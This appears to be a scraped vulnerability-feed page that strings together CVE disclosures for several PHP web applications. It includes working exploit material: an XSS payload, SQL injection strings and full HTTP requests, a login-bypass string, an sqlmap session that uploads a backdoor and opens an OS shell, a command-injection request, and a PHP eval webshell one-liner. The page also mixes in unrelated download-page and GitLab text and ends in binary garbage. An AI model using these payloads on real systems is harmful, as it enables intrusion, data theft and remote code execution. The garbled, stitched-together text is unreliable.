PHProjekt PhpSimplyGest and MyProjects version 1.3.0 suffer from a cross site scripting vulnerability.

    # Exploit Title: PHProjekt (PhpSimplyGest / MyProjects, 1.3.0) - Stored XSS (Cross-Site Scripting)# Date: 2022-05-05# Exploit Author: Andrea Intilangelo# Vendor Homepage: http://www.phprojekt.altervista.org (removed demo was at http://phprojekt.altervista.org/phpsimplygest130)# Software Link: https://github.com/robyfofo/MyProjects (original PhpSimplyGest https://github.com/robyfofo/PhpSimplyGest now merged/renamed into MyProjects)# Version: 1.3# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.32)# CVE: CVE-2022-27308Description:A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 (and related products from same vendor, like "MyProjects") allowsattacker to execute arbitrary web scripts or HTML.Injecting persistent javascript code inside the title description (or content) while creating a project, todo, timecard, estimates, report or finding,it will be triggered once page gets loaded.Steps to reproduce:Click on Projects and add or edit an existing one,Insert the following PoC inside the Title   <<SCRIPT>alert("XSS here");//\<</SCRIPT>Click on 'Send'.If a user visits the website dashboard, as well as project summary page, the javascript code will be rendered.Timeline:2022-01-08: Vulnerability discovered.2022-01-08: Vendor contacted.2022-02-09: No reply, vendor contacted for 2nd time.2022-02-18: Request for CVE reservation.2022-04-27: Assigned CVE number 2022-27308.2022-05-02: No reply, vendor contacted for 3rd time.2022-05-05: Public disclosure.PoC Screenshots:https://imagebin.ca/v/6g5OFET1pyZBhttps://imagebin.ca/v/6g6qLRC3X5kyhttps://postimg.cc/qgc19rg0

PHProjekt PhpSimplyGest / MyProjects 1.3.0 Cross Site Scripting

Royal Event Management System v1.0 was discovered to contain a SQL injection vulnerability via the todate parameter.

**Royal Event Management System - 'todate' SQL Injection (Authenticated)**

1.  Description:

Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal\_event/btndates\_report.php#?= Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2.  Proof of Concept:

In Burpsuite intercept the request from the affected page with 'todate' parameter and save it like poc.txt. Then run SQLmap to extract the data from the database:

sqlmap -r poc.txt --dbms=mysql

3.  Example payload:

(boolean-based)

\-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

4.  Burpsuite request:

POST /royal\_event/btndates\_report.php#?= HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 334  
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0  
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380  
Referer: http://localhost/royal\_event/btndates\_report.php#?=  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

\--f289a6438bcc45179bcd3eb7ddc555d0  
Content-Disposition: form-data; name="todate"

\-1' OR 1=1 OR 'ns'='ns  
\--f289a6438bcc45179bcd3eb7ddc555d0  
Content-Disposition: form-data; name="search"

3 --f289a6438bcc45179bcd3eb7ddc555d0  
Content-Disposition: form-data; name="fromdate"

01/01/2011  
\--f289a6438bcc45179bcd3eb7ddc555d0--

CVE-2022-28080: GitHub - erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated: CVE-2022-28080

College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter.

**Project: College Management System in PHP with source code**

Please scroll down and click on the download button to download the **College Management System In PHP** project for free

The College Management System is a simple project for keeping records of students, teachers, subjects, schedules, and all the college-related things. The project contains the user and admin sides. The admin has to manage all the management like adding students’ or teachers’ details and view their information as per the need. Admin has an important role in the management of this system. This project makes a convenient way for any educational organization to keep records of their students and teachers.

**About System**

This College Management System is in PHP, javascript, and CSS. Talking about the features of this system, it contains the user and Admin section. From here, the admin can view all the records of the enrolled students and registered teachers. Also, you can edit or delete any details as per the requirements.

The design of this project is pretty simple so that the user won’t find any difficulties while working on it. This System in PHP helps in easy management of various records of the students.

**How To Run The Project?**

To run this project, you must have installed a virtual server i.e XAMPP on your PC (for Windows). This College Management System is in PHP with source code is free to download, **Use for educational purposes only!**

_After Starting Apache and MySQL in XAMPP, follow the following steps._

_**1st Step:**_ Extract file  
_**2nd Step:**_ Copy the main project folder  
**_3rd Step:_** Paste in xampp/htdocs/

**_4th Step:_** Open a browser and go to URL “http://localhost/phpmyadmin/”  
_**5th Step:**_ Then, click on the databases tab  
_**6th Step:**_ Create a database naming “imperial\_college” and then click on the import tab  
**_7th Step:_** Click on browse file and select “imperial\_college.sql” file which is inside the “Database” folder  
**_8th Step:_** Click on go.

_**After Creating Database**_,

**_9th Step:_** Open a browser and go to URL “http://localhost/College-Management-System/” For the project demo, you can look at the video below:

**DOWNLOAD COLLEGE MANAGEMENT SYSTEM IN PHP WITH SOURCE CODE: CLICK THE BUTTON BELOW**

  

**Got stuck or need help customizing Student Admission System as per your need, go to our** **PHP tutorial** **or just comment down below and we will do our best to answer your question ASAP.** 

**Post navigation**

CVE-2022-28079: College Management System In PHP With Source Code

Sourcecodester Covid-19 Directory on Vaccination System 1.0 is vulnerable to SQL Injection via cmdcategory.

    # Exploit Title: Covid-19 Directory on Vaccination System 1.0 - SQLi Authentication Bypass# Date: 28/03/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html# Version: 1.0# Tested on: XAMPP, Linux1- Go to following url. >> http://localhost/covid-19-vaccination/admin/login.php2- We can login succesfully with SQL bypass method.**** Username = admin ' or "a" or '**** password = anything ###############################################POST /covid-19-vaccination/admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 63Origin: http://localhostConnection: closeReferer: http://localhost/covid-19-vaccination/admin/login.phpCookie: PHPSESSID=dras0itihsadtdkkkv7gv4hf67Upgrade-Insecure-Requests: 1txtusername=admin+%27+or+%22a%22+or+%27&txtpassword=1&btnlogin=--------------------------# Exploit Title: Covid-19 Directory on Vaccination System 1.0 - 'cmdcategory' SQL Injection# Date: 28/03/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html# Version: 1.0# Tested on: XAMPP, LinuxThe Covid-19 Directory on Vaccination System is vulnerable to SQL Injection that leads to Remote Code Execution.Sqlmap command :sqlmap -u 'http://localhost/covid-19-vaccination/hospital.php?cmdcategory=Private' -p cmdcategory --risk=3 --level=5 --threads=10 --keep-alive --os-shell Now you have a web shell uploaded to the server :sqlmap -u 'http://localhost/covid-19-vaccination/hospital.php?cmdcategory=Private' -p cmdcategory --risk=3 --level=5 --threads=10 --keep-alive --os-shell         ___       __H__                                                                                                                                                  ___ ___[,]_____ ___ ___  {1.6.3#stable}                                                                                                                     |_ -| . [.]     | .'| . |                                                                                                                                    |___|_  [,]_|_|_|__,|  _|                                                                                                                                          |_|V...       |_|   https://sqlmap.org                                                                                                                 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 00:35:27 /2022-03-28/[00:35:31] [INFO] resuming back-end DBMS 'mysql' [00:35:31] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: cmdcategory (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: cmdcategory=Private') AND 3773=3773-- fUxB    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: cmdcategory=Private') AND (SELECT 9765 FROM (SELECT(SLEEP(5)))DnRk)-- LWnB---[00:35:32] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.1.2, Apache 2.4.52back-end DBMS: MySQL 5 (MariaDB fork)[00:35:32] [INFO] going to use a web backdoor for command prompt[00:35:32] [INFO] fingerprinting the back-end DBMS operating system[00:35:32] [INFO] the back-end DBMS operating system is Linuxwhich web application language does the web server support?[1] ASP[2] ASPX[3] JSP[4] PHP (default)> 4do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n[00:36:09] [WARNING] unable to automatically retrieve the web server document rootwhat do you want to use for writable directory?[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)[2] custom location(s)[3] custom directory list file[4] brute force search> 2please provide a comma separate list of absolute directory paths: /opt/lampp/htdocs/covid-19-vaccination/[00:36:30] [WARNING] unable to automatically parse any web server path[00:36:30] [INFO] trying to upload the file stager on '/opt/lampp/htdocs/covid-19-vaccination/' via LIMIT 'LINES TERMINATED BY' method[00:36:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)[00:36:30] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')[00:36:31] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/covid-19-vaccination/' - http://localhost:80/covid-19-vaccination/tmpumlrg.php[00:36:31] [WARNING] unable to upload the file through the web file stager to '/opt/lampp/htdocs/covid-19-vaccination/'[00:36:31] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different serversdo you want to try the same method used for the file stager? [Y/n] y[00:36:33] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/covid-19-vaccination/' - http://localhost:80/covid-19-vaccination/tmpbwipl.php[00:36:33] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTERos-shell>

CVE-2022-28530: Covid-19 Directory On Vaccination System 1.0 SQL Injection ≈ Packet Storm

In LibreHealth EHR 2.0.0, lack of sanitization of the GET parameters formseq and formid in interface\orders\find_order_popup.php leads to multiple cross-site scripting (XSS) vulnerabilities.

GitLab 15.0 is launching on May 22! This version brings many exciting improvements, but also removes deprecated features and introduces **breaking changes** that may impact your workflow. To see what is being deprecated and removed, please visit Breaking changes in 15.0 and Deprecations.

CVE-2022-29940: Tags · LibreHealth / LibreHealth EHR / LibreHealth EHR Base · GitLab

A OS Command Injection vulnerability was discovered in Artica Proxy 4.30.000000. Attackers can execute OS commands in cyrus.events.php with GET param logs and POST param rp.

**Vendor && Product**

www.articatech.com

Artica Web Proxy v4.30.000000

Download: http://www.articatech.com/download.php

**Reproduction**

Login the web account, use this poc

> _Because the execution result is not echoed, we view the result by writing a file_

https://192.168.108.14:9000/cyrus.events.php?logs=  
 ​  
 POST:  
 rp=;id>../1.txt;

access https://192.168.108.14:9000/1.txt, we can see the execution result.

**OS Command Injection Analysis**

The vulnerable file is in ： cyrus.events.php, it receives a parameter logs and execute function logs()

In the function logs(), it receives another parameter rp with POST method, then take them to the file cyrus.php with ?cyrus-events=yes

In cyrus.php, cyrus-events corresponds to cyrus_events() which can execute os command through ;

$cmdline="$grep --binary-files=text -Ei \\"$search\\" /var/log/mail.log|$tail -n $rp  >$logfile 2>&1";  
...  
shell\_exec($cmdline);

CVE-2021-41739: Artica Proxy 4.30 cyrus.events.php RCE - rootless - Medium

An arbitrary file upload vulnerability in Web@rchiv 1.0 allows attackers to execute arbitrary commands via a crafted PHP file.

**CVE-2021-39458****Arbitrary file upload vulnerability**

*   Vendor: zeitprax.com / blitzprax.com
*   Product: Web@rchiv
*   Version: 1.0

An arbitrary file upload vulnerability in Web@archiv 1.0 allows attackers to execute arbitrary commands via a malicious PHP file.

To exploit the vulnerabilty you have to upload a php file which contains the shell\_exec() function of php to execute local commands on the system. The Applications is intended for uploading documents but does not filter against extensions or anything else. By choosing the file it will be immediately uploaded and a direct hyperlink will be displayed.

**Generated hyperlink before submitting the actual file**

**Test for proper php code execution**

**Output of the command "id"**

**PoC PHP file**

CVE-2022-29347: MyOwnCVEs/CVE-2022-29347 at main · evildrummer/MyOwnCVEs

Seacms v11.6 was discovered to contain a remote command execution (RCE) vulnerability via the Mail Server Settings.

1、Log in to the background, click System and then click Mail Server Settings.Write code in any box in the box below, take phpinfo() as an example, you need to write {${phpinfo()}}, if you want to write a sentence Trojan, you can write ${@eval($\_POST\[ a\])} (it can also be successfully connected after testing).

2、Then refresh the page directly, or directly access /data/admin/smtp.php in the root path

CVE-2022-28076: seacms v11.6 Vulnerability Execution Command · Issue #1 · likCodinG/seacms_vul

A reflected cross-site scripting (XSS) vulnerability in the component Query.php of arPHP v3.6.0 allows attackers to execute arbitrary web scripts.

This blog will be updated with more information about the vulnerability and the exploitation once the CVE is assigned.

**Discovered by: Mohammed Fadhl Al-Barbari****CVE-ID : WaitListed****Vendor : https://www.ar-php.org/****Vulnerability type : Cross-Site Scripting****Verified on : arPHP 3.6.0****Description :**

Cross-Site Scripting vulnerability was found in arPHP examples. The affected script takes parameters without any filtration. an attacker could execute any JS code or inject an HTML page.

**POCs : Will be avaliable soon****Follow us:**

**Twitter**:  
Mohammed Al-Barbari

**LinkedIn**:  
Mohammed Al-Barbari

CVE-2022-28081: arPHP 3.6.0 - Reflected XSS

Poultry Farm Management System v1.0 was discovered to contain a SQL injection vulnerability via the Item parameter at /farm/store.php.

��h�S�5�?�s�?�md���W�9�,��\_���#A\\��l��\[��&���k+��7нu�=L ����(��$���{��������;8���4#�|@$�pm�naΆl3h@��W��S�:����x���d��&�ʣ�?�L��DO��8����{����yV �">VH7�Ȑ�oɇaD1p���Ұ^��fƶ�2�+v�y�k�ބ�|�zsPqa�A�-LW(�. 2Ħ�9�|M�jW�P'�6��fNF�#����<�4�����#� X�X�x��htG����IG�3S���麑Ե��6�j�����^��"pN4qv�T/�q���\]9Ջ�n��5qv�T/��q���ٍS͸� �J��Ug7N�x��ٍӿp��u6h ��<�� K�#���,� �/�$�w������=�OD�1���C+��DB�knyg� ��\`?���")�I�hL '��1I�D�����YC"��>e�)�8)��������H��e�?h8�co>��p�uy�Ȋ%��Q\_ņ�&�Q+��A�gƼe+5X^m�DnIkԄ�/����Ȝ�\[�gr��L\[�C�՛�q1+������q9��6&�D����\[�Ve��n��3���/\[4����+�d�F\`ꀺ�Y"���T��\* �v�m�d\`Z�uey�ڈ)�5���UR^�ܽs?3�3x��v�tB�;� �a=�|\]C��U��'�������v%���볥ҕ�5�r+&sр�-��~|ހj���YW3!ɵ�RgkqM�a(�iWS�TH�k��Mt�Lu--���\\�"�5����M��ͬ��Tڨ�CL}0��t �� EW�e��Ǖv1����b �����\[�O��x��H\_����m�L0��z1�z��b�����b�׸�d�;�G�bU�К��|{��7�9����0����MCo ~�#~���h�lU�y j����z�ii���>�U{��1k=\`s��ۢ���{���:Y�ל��|�3����Z\_�GO:��YFØ�Q��)�ۥm��� �@�!}���g,ds�

Tag

#php